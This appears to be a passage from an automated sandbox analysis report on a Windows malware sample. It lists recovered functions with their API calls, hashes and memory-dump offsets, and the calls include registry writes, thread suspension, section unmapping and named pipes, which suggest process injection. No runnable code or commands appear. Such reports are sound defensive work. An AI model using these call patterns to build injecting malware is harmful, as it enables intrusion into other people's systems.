  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 29
  • API ID: HeapFreeRegisterWaitForSingleObjectRtlAllocateHeapmemcpy
  • String ID:
  • API String ID: 1976740423-0
  • Opcode ID: 00e719380342739fce2d9a83077352ae1e8e636be9c83fb6a114a482fd48beda
  • Instruction ID: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
  • Opcode Fuzzy Hash: 8CF059B0118943C9E83B20D21991BBEAB423F935CBC0E4631E40308A4F1E4762B63A98
  • Instruction Fuzzy Hash: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C665D
  • memcpy.NTDLL(00000018,?,?), ref: 001C6686
  • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00005549,00000000,000000FF,00000008), ref: 001C66C5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C66D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
